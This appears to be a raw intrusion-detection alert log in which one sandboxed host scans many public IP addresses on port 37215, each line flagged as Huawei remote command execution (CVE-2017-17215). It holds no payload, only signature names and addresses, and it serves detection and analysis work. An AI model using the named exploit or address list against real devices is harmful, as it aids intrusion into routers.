                                                    07/10/24-08:27:30.414315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5275637215192.168.2.14157.150.195.246
                                                    07/10/24-08:26:11.593269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396837215192.168.2.1441.29.129.224
                                                    07/10/24-08:26:33.207686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5841837215192.168.2.1460.34.4.141
                                                    07/10/24-08:27:08.446454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975437215192.168.2.1441.135.23.90
                                                    07/10/24-08:26:47.758583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3284237215192.168.2.14157.85.75.137
                                                    07/10/24-08:26:25.503174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5910037215192.168.2.14157.136.175.21
                                                    07/10/24-08:26:29.661405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435437215192.168.2.1443.14.133.58
                                                    07/10/24-08:26:22.211996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895237215192.168.2.14197.20.254.100
                                                    07/10/24-08:26:25.515269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4613637215192.168.2.14197.90.6.208
                                                    07/10/24-08:27:10.595154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4046437215192.168.2.14197.125.138.79
                                                    07/10/24-08:26:13.850694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566437215192.168.2.1441.71.163.99
                                                    07/10/24-08:26:57.675135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3839837215192.168.2.1469.8.129.204
                                                    07/10/24-08:26:41.396531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5431837215192.168.2.14157.36.188.137
                                                    07/10/24-08:26:59.550214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4238037215192.168.2.14157.224.55.176
                                                    07/10/24-08:26:59.822486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4061037215192.168.2.14157.174.4.161
                                                    07/10/24-08:27:23.817367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386637215192.168.2.14205.7.70.97
                                                    07/10/24-08:26:36.336405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4964637215192.168.2.1441.39.224.102
                                                    07/10/24-08:26:18.037621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5542837215192.168.2.14157.207.230.253
                                                    07/10/24-08:27:07.353904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5333037215192.168.2.14197.138.93.56
                                                    07/10/24-08:26:59.835499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4503837215192.168.2.14120.107.88.236
                                                    07/10/24-08:27:30.560265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403837215192.168.2.1441.127.35.143
                                                    07/10/24-08:26:43.881228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4280437215192.168.2.14157.142.96.123
                                                    07/10/24-08:27:30.500582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024037215192.168.2.1420.36.203.128
                                                    07/10/24-08:27:31.474983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485237215192.168.2.14157.167.5.178
                                                    07/10/24-08:26:57.670364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5765637215192.168.2.14197.146.109.170
                                                    07/10/24-08:26:15.871389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3808837215192.168.2.1490.64.172.84
                                                    07/10/24-08:27:22.455545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5770237215192.168.2.14197.116.68.4
                                                    07/10/24-08:26:14.623254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3456637215192.168.2.14166.77.33.93
                                                    07/10/24-08:27:27.085141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4850037215192.168.2.14169.174.205.249
                                                    07/10/24-08:26:15.871389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4719237215192.168.2.14197.74.93.216
                                                    07/10/24-08:27:20.401175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5366637215192.168.2.1441.182.235.229
                                                    07/10/24-08:27:33.879703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4896037215192.168.2.1441.172.238.36
                                                    07/10/24-08:27:30.505029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3298837215192.168.2.14157.212.129.175
                                                    07/10/24-08:27:24.985938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3347837215192.168.2.1441.218.184.77
                                                    07/10/24-08:26:20.167079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4272837215192.168.2.1481.197.57.97
                                                    07/10/24-08:27:05.113927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3875637215192.168.2.14197.254.138.0
                                                    07/10/24-08:26:28.927122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172637215192.168.2.14158.13.77.98
                                                    07/10/24-08:26:29.868955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3595637215192.168.2.1441.247.170.121
                                                    07/10/24-08:26:23.356986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852037215192.168.2.14157.102.231.126
                                                    07/10/24-08:26:59.875965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3504637215192.168.2.14157.79.7.244
                                                    07/10/24-08:26:22.218998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3936237215192.168.2.1435.0.14.219
                                                    07/10/24-08:26:34.196006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4553837215192.168.2.14197.65.59.213
                                                    07/10/24-08:26:23.344652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5562837215192.168.2.1441.170.58.186
                                                    07/10/24-08:26:41.514875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564237215192.168.2.1441.160.202.67
                                                    07/10/24-08:27:05.077819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4806637215192.168.2.14157.202.2.80
                                                    07/10/24-08:27:28.100122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4470637215192.168.2.1441.224.139.37
                                                    07/10/24-08:26:29.860870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5014637215192.168.2.1441.203.214.148
                                                    07/10/24-08:27:27.144985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5546637215192.168.2.14197.224.99.62
                                                    07/10/24-08:27:28.180841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3629237215192.168.2.1441.133.218.220
                                                    07/10/24-08:27:34.127270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416037215192.168.2.14114.47.204.56
                                                    07/10/24-08:26:42.380057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5474637215192.168.2.14115.16.76.21
                                                    07/10/24-08:26:15.788826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4781037215192.168.2.14180.87.170.50
                                                    07/10/24-08:26:29.797142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407237215192.168.2.1432.170.42.178
                                                    07/10/24-08:26:17.996643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359237215192.168.2.14157.85.11.225
                                                    07/10/24-08:27:03.019463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527437215192.168.2.1441.169.81.136
                                                    07/10/24-08:27:31.453748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473037215192.168.2.1441.61.36.161
                                                    07/10/24-08:27:28.162130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349837215192.168.2.1475.106.70.4
                                                    07/10/24-08:26:20.091176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4731637215192.168.2.1441.27.29.184
                                                    07/10/24-08:27:29.339499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4263637215192.168.2.1441.58.14.35
                                                    07/10/24-08:26:45.656574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5251637215192.168.2.1441.247.247.252
                                                    07/10/24-08:26:17.952819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068437215192.168.2.1441.27.208.217
                                                    07/10/24-08:27:31.522185TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4301037215192.168.2.14157.220.106.253
                                                    07/10/24-08:26:31.070289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4161637215192.168.2.1441.150.61.210
                                                    07/10/24-08:26:59.648559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5417637215192.168.2.14104.89.89.26
                                                    07/10/24-08:27:22.527707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825237215192.168.2.14157.215.125.10
                                                    07/10/24-08:27:22.460068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943637215192.168.2.1441.99.113.129
                                                    07/10/24-08:27:13.982789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4098037215192.168.2.14197.79.134.231
                                                    07/10/24-08:27:17.023576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4208237215192.168.2.14157.169.51.30
                                                    07/10/24-08:27:05.156196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4127637215192.168.2.1441.212.184.135
                                                    07/10/24-08:26:36.431557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332637215192.168.2.14128.252.104.142
                                                    07/10/24-08:26:59.539411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5623237215192.168.2.14173.164.30.61
                                                    07/10/24-08:26:59.663550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5063237215192.168.2.14197.182.1.39
                                                    07/10/24-08:26:59.636045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544437215192.168.2.14143.5.22.203
                                                    07/10/24-08:26:11.135196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3990237215192.168.2.14157.152.213.148
                                                    07/10/24-08:26:59.662577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5062237215192.168.2.14157.240.165.124
                                                    07/10/24-08:27:02.833668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3699837215192.168.2.14189.12.231.86
                                                    07/10/24-08:26:23.354266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3648637215192.168.2.1441.212.125.193
                                                    07/10/24-08:26:28.856505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5168637215192.168.2.14197.203.130.0
                                                    07/10/24-08:27:30.562651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4155637215192.168.2.14199.29.164.94
                                                    07/10/24-08:26:20.119674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664437215192.168.2.1441.222.202.58
                                                    07/10/24-08:27:23.873302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3295637215192.168.2.1447.148.158.1
                                                    07/10/24-08:27:07.401742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5321437215192.168.2.14197.6.242.107
                                                    07/10/24-08:27:30.547260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3985637215192.168.2.14197.109.110.150
                                                    07/10/24-08:26:41.440883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5014237215192.168.2.14157.214.106.141
                                                    07/10/24-08:26:49.866134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024437215192.168.2.1441.68.140.78
                                                    07/10/24-08:27:30.406013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4038037215192.168.2.14157.178.46.16
                                                    07/10/24-08:26:29.842952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753237215192.168.2.14197.112.193.159
                                                    07/10/24-08:26:43.841867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4147637215192.168.2.14157.211.174.233
                                                    07/10/24-08:26:28.862875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768237215192.168.2.1441.63.227.2
                                                    07/10/24-08:27:05.228923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626637215192.168.2.14197.48.65.22
                                                    07/10/24-08:26:55.457969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3883437215192.168.2.1441.148.198.203
                                                    07/10/24-08:27:22.882640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6019037215192.168.2.1441.169.131.245
                                                    07/10/24-08:27:14.839655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5821037215192.168.2.1441.122.45.41
                                                    07/10/24-08:27:32.603771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5122837215192.168.2.14104.92.86.123
                                                    07/10/24-08:26:22.260349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4232437215192.168.2.14197.0.148.46
                                                    07/10/24-08:26:55.320673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4603037215192.168.2.1441.54.2.40
                                                    07/10/24-08:27:27.065687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3310637215192.168.2.14157.6.30.41
                                                    07/10/24-08:27:14.875124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4554437215192.168.2.14114.75.197.55
                                                    07/10/24-08:27:28.126957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3880437215192.168.2.14197.219.10.226
                                                    07/10/24-08:26:45.632406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5365037215192.168.2.14197.226.48.104
                                                    07/10/24-08:26:22.285937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5108437215192.168.2.1441.91.134.150
                                                    07/10/24-08:27:34.137438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5209237215192.168.2.1441.126.89.58
                                                    07/10/24-08:26:53.129379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4351037215192.168.2.1486.38.110.191
                                                    07/10/24-08:26:33.161140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4101237215192.168.2.14197.143.139.129
                                                    07/10/24-08:26:15.854117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564437215192.168.2.14197.192.190.154
                                                    07/10/24-08:27:30.468410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4850437215192.168.2.14157.240.97.200
                                                    07/10/24-08:26:29.851044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5139437215192.168.2.14107.185.174.90
                                                    07/10/24-08:26:59.637493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4829837215192.168.2.14212.123.209.126
                                                    07/10/24-08:27:07.342046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3568037215192.168.2.14157.33.173.74
                                                    07/10/24-08:26:34.252439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4722037215192.168.2.1441.210.126.34
                                                    07/10/24-08:27:02.868135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516237215192.168.2.14197.74.70.191
                                                    07/10/24-08:26:59.766044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324037215192.168.2.14134.96.86.166
                                                    07/10/24-08:27:16.996210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131237215192.168.2.14157.111.140.20
                                                    07/10/24-08:27:30.523582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4521437215192.168.2.14197.43.248.232
                                                    07/10/24-08:26:22.221406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5531237215192.168.2.1470.11.30.103
                                                    07/10/24-08:26:18.008169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6048437215192.168.2.1474.12.218.64
                                                    07/10/24-08:26:41.549271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5379637215192.168.2.14157.36.183.43
                                                    07/10/24-08:26:41.533380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439637215192.168.2.14197.211.239.88
                                                    07/10/24-08:26:28.775037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686237215192.168.2.14157.143.241.196
                                                    07/10/24-08:26:29.855669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3889837215192.168.2.1441.194.12.74
                                                    07/10/24-08:26:36.391791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4345037215192.168.2.1438.251.203.24
                                                    07/10/24-08:26:47.881197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3910237215192.168.2.1441.230.110.6
                                                    07/10/24-08:26:18.004122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3495237215192.168.2.14197.163.130.73
                                                    07/10/24-08:26:43.671391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5069837215192.168.2.1441.48.106.103
                                                    07/10/24-08:27:13.869693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3914037215192.168.2.14157.15.46.16
                                                    07/10/24-08:26:25.489783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3795237215192.168.2.14157.192.146.105
                                                    07/10/24-08:26:28.736884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4828837215192.168.2.1486.107.142.31
                                                    07/10/24-08:27:28.174408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5357437215192.168.2.1441.133.40.88
                                                    07/10/24-08:27:02.674320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6015637215192.168.2.14157.67.40.43
                                                    07/10/24-08:27:24.995730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4279837215192.168.2.1441.122.16.71
                                                    07/10/24-08:26:43.900860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6051237215192.168.2.14149.113.158.233
                                                    07/10/24-08:26:47.851193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3320237215192.168.2.1441.28.194.3
                                                    07/10/24-08:26:55.457969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4347037215192.168.2.14197.237.41.11
                                                    07/10/24-08:26:28.736673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4837037215192.168.2.14157.29.17.185
                                                    07/10/24-08:27:32.600329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5182037215192.168.2.14197.143.250.138
                                                    07/10/24-08:26:45.681028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379637215192.168.2.1441.84.54.167
                                                    07/10/24-08:26:42.406060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317437215192.168.2.1481.132.123.195
                                                    07/10/24-08:26:11.485885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435637215192.168.2.14197.178.199.181
                                                    07/10/24-08:26:11.168709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5013637215192.168.2.14157.61.150.149
                                                    07/10/24-08:27:20.513537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4992637215192.168.2.1492.112.56.67
                                                    07/10/24-08:27:11.484903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4727437215192.168.2.1452.83.199.206
                                                    07/10/24-08:26:25.423128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4709837215192.168.2.1483.190.175.238
                                                    07/10/24-08:26:33.199657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4539637215192.168.2.14197.58.215.3
                                                    07/10/24-08:27:07.369832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6083237215192.168.2.1441.201.122.129
                                                    07/10/24-08:27:24.921580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659437215192.168.2.14197.209.36.245
                                                    07/10/24-08:27:02.883243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973637215192.168.2.14157.112.236.62
                                                    07/10/24-08:26:59.607971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4926837215192.168.2.14197.190.228.100
                                                    07/10/24-08:27:11.496514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4536837215192.168.2.1441.247.83.205
                                                    07/10/24-08:27:13.876444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3978237215192.168.2.14157.120.247.94
                                                    07/10/24-08:26:18.019477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5729237215192.168.2.14157.83.17.146
                                                    07/10/24-08:26:31.048533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5153037215192.168.2.14157.247.223.81
                                                    07/10/24-08:26:49.802588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3857837215192.168.2.14197.27.224.2
                                                    07/10/24-08:27:13.967608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3312637215192.168.2.14188.203.33.88
                                                    07/10/24-08:26:53.207005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575837215192.168.2.1441.58.33.33
                                                    07/10/24-08:26:15.793642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3500237215192.168.2.14157.123.233.245
                                                    07/10/24-08:27:02.903191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4156237215192.168.2.1441.227.75.114
                                                    07/10/24-08:27:22.835160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4908837215192.168.2.1442.226.79.19
                                                    07/10/24-08:26:18.011979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4541037215192.168.2.14157.168.30.151
                                                    07/10/24-08:27:33.980706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5975237215192.168.2.14157.28.32.20
                                                    07/10/24-08:26:48.000164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5040237215192.168.2.1441.217.152.247
                                                    07/10/24-08:26:36.327506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5122237215192.168.2.14157.136.174.221
                                                    07/10/24-08:26:28.933010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810237215192.168.2.1436.68.212.25
                                                    07/10/24-08:26:55.397639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024637215192.168.2.1441.47.65.131
                                                    07/10/24-08:26:20.168477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4862637215192.168.2.14115.58.104.34
                                                    07/10/24-08:26:20.150804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5146237215192.168.2.1441.91.241.119
                                                    07/10/24-08:26:13.841293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917837215192.168.2.1441.210.14.163
                                                    07/10/24-08:26:53.172944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5478437215192.168.2.14157.113.15.116
                                                    07/10/24-08:26:59.774458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5312437215192.168.2.14197.63.211.206
                                                    07/10/24-08:26:17.996817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4891837215192.168.2.14197.214.170.211
                                                    07/10/24-08:26:11.155522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4082437215192.168.2.14157.5.208.61
                                                    07/10/24-08:27:10.537865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5047637215192.168.2.14197.215.176.178
                                                    07/10/24-08:27:19.251231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4463837215192.168.2.14157.73.71.155
                                                    07/10/24-08:27:10.652052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4453637215192.168.2.14197.72.209.121
                                                    07/10/24-08:26:45.663008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4023437215192.168.2.14197.89.144.229
                                                    07/10/24-08:27:22.452806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3570237215192.168.2.1441.187.84.137
                                                    07/10/24-08:26:14.812740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4528637215192.168.2.1441.173.39.158
                                                    07/10/24-08:27:23.898408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5250837215192.168.2.14197.143.212.42
                                                    07/10/24-08:27:05.121517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4765237215192.168.2.14197.3.186.95
                                                    07/10/24-08:26:22.272664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5420837215192.168.2.1441.73.79.247
                                                    07/10/24-08:26:41.419620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3919637215192.168.2.14197.153.244.134
                                                    07/10/24-08:26:31.084469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4005037215192.168.2.1458.66.213.201
                                                    07/10/24-08:26:51.979594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5463837215192.168.2.1441.55.10.106
                                                    07/10/24-08:27:17.088792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4058437215192.168.2.1481.113.47.191
                                                    07/10/24-08:27:23.773863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6075637215192.168.2.14183.165.74.79
                                                    07/10/24-08:27:32.587332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5554237215192.168.2.14197.28.44.192
                                                    07/10/24-08:26:43.758482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4289437215192.168.2.14197.133.54.1
